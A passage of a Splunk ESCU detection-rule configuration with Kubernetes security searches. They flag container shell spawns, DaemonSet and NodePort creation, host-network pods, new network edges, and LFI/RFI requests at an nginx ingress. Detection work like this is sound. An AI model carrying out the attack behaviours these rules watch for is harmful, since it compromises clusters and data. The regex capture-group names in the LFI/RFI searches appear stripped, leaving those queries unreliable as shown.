action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-12-14
action.escu.modification_date = 2023-12-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes DaemonSet Deployed - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Security"]
action.risk = 1
action.risk.param._risk_message = DaemonSet deployed to Kubernetes by user $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kubernetes DaemonSet Deployed - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kube_audit` "objectRef.resource"=daemonsets verb=create | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind responseStatus.code sourceIPs{} stage user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_daemonset_deployed_filter`

[ESCU - Kubernetes Falco Shell Spawned - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects instances where a shell is spawned within a Kubernetes container, a behavior often indicative of an attacker gaining unauthorized access. Leveraging Falco, a cloud-native runtime security tool, this analytic monitors system calls within the Kubernetes environment, flagging when a shell is spawned in a container. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute arbitrary commands, manipulate container processes, or escalate privileges, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects instances where a shell is spawned within a Kubernetes container, a behavior often indicative of an attacker gaining unauthorized access. Leveraging Falco, a cloud-native runtime security tool, this analytic monitors system calls within the Kubernetes environment, flagging when a shell is spawned in a container. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute arbitrary commands, manipulate container processes, or escalate privileges, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information.
action.escu.how_to_implement = The detection is based on data that originates from Falco, a cloud-native runtime security tool. Falco is designed to detect anomalous activity in your applications and is a crucial component of this detection rule. To implement this detection rule, you need to install and configure Falco in your Kubernetes environment. Once Falco is set up, it will monitor the system calls in your Kubernetes infrastructure and generate logs for any suspicious activity. These logs are then ingested by Splunk for analysis. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-12-13
action.escu.modification_date = 2023-12-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Falco Shell Spawned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Security"]
action.risk = 1
action.risk.param._risk_message = A shell is spawned in the container $container_name$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kubernetes Falco Shell Spawned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kube_container_falco` "A shell was spawned in a container" | fillnull | stats count by container_image container_image_tag container_name parent proc_exepath process user | `kubernetes_falco_shell_spawned_filter`

[ESCU - Kubernetes newly seen TCP edge - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects TCP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a Kubernetes cluster. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour with that over the last 30 days in order to detect newly seen inter-workload communication. Newly seen network connections in a microservices-based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the application's ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the application's integrity, availability, and confidentiality at risk.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic detects TCP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a Kubernetes cluster. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour with that over the last 30 days in order to detect newly seen inter-workload communication. Newly seen network connections in a microservices-based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the application's ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the application's integrity, availability, and confidentiality at risk.
action.escu.how_to_implement = To gather NPM metrics, deploy the OpenTelemetry Collector to the Kubernetes cluster and enable Network Performance Monitoring according to the instructions found in Splunk Docs https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly, set up the add-on to ingest metrics from O11y Cloud using the following settings, with any other settings left at default:\
* Name sim_npm_metrics_to_metrics_index \
* Org ID \
* Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \
* Metric Resolution 10000
action.escu.known_false_positives = unknown
action.escu.creation_date = 2024-01-10
action.escu.modification_date = 2024-01-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes newly seen TCP edge - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"]
action.risk = 1
action.risk.param._risk_message = Kubernetes newly seen TCP edge in kubernetes cluster $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Kubernetes newly seen TCP edge - Rule
action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | mstats count(tcp.packets) as tcp.packets_count where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name dest.workload.name | eval current="True" | append [ mstats count(tcp.packets) as tcp.packets_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name dest.workload.name | eval current="false" ] | eventstats values(current) as current by source.workload.name dest.workload.name | search current="true" current!="false" | rename k8s.cluster.name as host | `kubernetes_newly_seen_tcp_edge_filter`

[ESCU - Kubernetes newly seen UDP edge - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects UDP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a Kubernetes cluster. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour with that over the last 30 days in order to detect newly seen inter-workload communication. Newly seen network connections in a microservices-based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the application's ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the application's integrity, availability, and confidentiality at risk.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic detects UDP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a Kubernetes cluster. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour with that over the last 30 days in order to detect newly seen inter-workload communication. Newly seen network connections in a microservices-based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the application's ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the application's integrity, availability, and confidentiality at risk.
action.escu.how_to_implement = To gather NPM metrics, deploy the OpenTelemetry Collector to the Kubernetes cluster and enable Network Performance Monitoring according to the instructions found in Splunk Docs https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly, set up the add-on to ingest metrics from O11y Cloud using the following settings, with any other settings left at default:\
* Name sim_npm_metrics_to_metrics_index \
* Org ID \
* Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \
* Metric Resolution 10000
action.escu.known_false_positives = unknown
action.escu.creation_date = 2024-01-10
action.escu.modification_date = 2024-01-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes newly seen UDP edge - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"]
action.risk = 1
action.risk.param._risk_message = Kubernetes newly seen UDP edge in kubernetes cluster $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Kubernetes newly seen UDP edge - Rule
action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | mstats count(udp.packets) as udp.packets_count where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name dest.workload.name | eval current="True" | append [ mstats count(udp.packets) as udp.packets_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name dest.workload.name | eval current="false" ] | eventstats values(current) as current by source.workload.name dest.workload.name | search current="true" current!="false" | rename k8s.cluster.name as host | `kubernetes_newly_seen_udp_edge_filter`

[ESCU - Kubernetes Nginx Ingress LFI - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search uses the Kubernetes logs from an nginx ingress controller to detect local file inclusion attacks.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search uses the Kubernetes logs from an nginx ingress controller to detect local file inclusion attacks.
action.escu.how_to_implement = You must ingest Kubernetes logs through Splunk Connect for Kubernetes.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Nginx Ingress LFI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Local File Inclusion Attack detected on $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kubernetes Nginx Ingress LFI - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search uses the Kubernetes logs from an nginx ingress controller to detect local file inclusion attacks.
action.notable.param.rule_title = Kubernetes Nginx Ingress LFI
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_container_controller` | rex field=_raw "^(?\S+)\s+-\s+-\s+\[(?[^\]]*)\]\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\"(?[^\"]*)\"\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\[(?[^\]]*)\]\s\[(?[^\]]*)\]\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)" | lookup local_file_inclusion_paths local_file_inclusion_paths AS request OUTPUT lfi_path | search lfi_path=yes | rename remote_addr AS src_ip, upstream_status as status, proxy_upstream_name as proxy | rex field=request "^(?\S+)\s(?\S+)\s" | eval phase="operate" | eval severity="high" | stats count min(_time) as firstTime max(_time) as lastTime by src_ip, status, url, http_method, host, http_user_agent, proxy, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kubernetes_nginx_ingress_lfi_filter`

[ESCU - Kubernetes Nginx Ingress RFI - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search uses the Kubernetes logs from an nginx ingress controller to detect remote file inclusion attacks.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search uses the Kubernetes logs from an nginx ingress controller to detect remote file inclusion attacks.
action.escu.how_to_implement = You must ingest Kubernetes logs through Splunk Connect for Kubernetes.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Nginx Ingress RFI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Remote File Inclusion Attack detected on $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kubernetes Nginx Ingress RFI - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search uses the Kubernetes logs from an nginx ingress controller to detect remote file inclusion attacks.
action.notable.param.rule_title = Kubernetes Nginx Ingress RFI
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_container_controller` | rex field=_raw "^(?\S+)\s+-\s+-\s+\[(?[^\]]*)\]\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\"(?[^\"]*)\"\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\[(?[^\]]*)\]\s\[(?[^\]]*)\]\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)" | rex field=request "^(?\S+)?\s(?\S+)\s" | rex field=url "(?\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" | search dest_ip=* | rename remote_addr AS src_ip, upstream_status as status, proxy_upstream_name as proxy | eval phase="operate" | eval severity="medium" | stats count min(_time) as firstTime max(_time) as lastTime by src_ip, dest_ip, status, url, http_method, host, http_user_agent, proxy, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kubernetes_nginx_ingress_rfi_filter`

[ESCU - Kubernetes Node Port Creation - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation of a Kubernetes node port service, an action that exposes a service to the external network. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a Node Port service. This behavior is worth identifying for a SOC as it could potentially allow an attacker to access internal services, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects the creation of a Kubernetes node port service, an action that exposes a service to the external network. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a Node Port service. This behavior is worth identifying for a SOC as it could potentially allow an attacker to access internal services, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information.
action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md.
action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-13 action.escu.modification_date = 2023-12-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Node Port Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes node port creation from user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Node Port Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` "objectRef.resource"=services verb=create requestObject.spec.type=NodePort | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind requestObject.spec.type responseStatus.code sourceIPs{} stage user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_node_port_creation_filter` [ESCU - Kubernetes Pod Created in Default Namespace - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the 
creation of pods in the default, kube-system, or kube-public namespaces. It identifies this behavior by monitoring Kubernetes audit logs for pod creation events in these namespaces. This behavior is worth identifying for a SOC as it may indicate an attacker attempting to hide their presence or evade defenses. Only administrators should typically create pods in the kube-system namespace, and the default and kube-public namespaces should not be used in production. The impact of the attack could be significant, as it may indicate a successful cluster breach and ongoing malicious activity. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of pods in the default, kube-system, or kube-public namespaces. It identifies this behavior by monitoring Kubernetes audit logs for pod creation events in these namespaces. This behavior is worth identifying for a SOC as it may indicate an attacker attempting to hide their presence or evade defenses. Only administrators should typically create pods in the kube-system namespace, and the default and kube-public namespaces should not be used in production. The impact of the attack could be significant, as it may indicate a successful cluster breach and ongoing malicious activity. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. 
This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Pod Created in Default Namespace - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes Pod Created in Default Namespace by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Pod Created in Default Namespace - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=pods verb=create objectRef.namespace IN ("default", "kube-system", "kube-public") | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | 
`kubernetes_pod_created_in_default_namespace_filter` [ESCU - Kubernetes Pod With Host Network Attachment - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a pod with host network attachment in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation or update of pods with host network configuration. This behavior is worth identifying for a SOC as it could potentially allow an attacker to listen to all network traffic on the node and other compute on the network namespace, capturing secrets passed in arguments or connections to escalate their privileges. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of a pod with host network attachment in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation or update of pods with host network configuration. This behavior is worth identifying for a SOC as it could potentially allow an attacker to listen to all network traffic on the node and other compute on the network namespace, capturing secrets passed in arguments or connections to escalate their privileges. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. 
Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-14 action.escu.modification_date = 2023-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Pod With Host Network Attachment - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes pod with host network attachment from user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Pod With Host Network Attachment - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=pods verb=create OR verb=update 
requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration=*\"hostNetwork\":true* | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind responseStatus.code sourceIPs{} stage user.username userAgent verb requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_pod_with_host_network_attachment_filter` [ESCU - Kubernetes Previously Unseen Container Image Name - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies containerised workloads that have been created using a previously unseen image. This detection leverages container metrics harvested using an OTEL collector and the Kubernetes cluster receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection uses the k8s.container.ready metric to compare the container image names seen in the last 1 hour 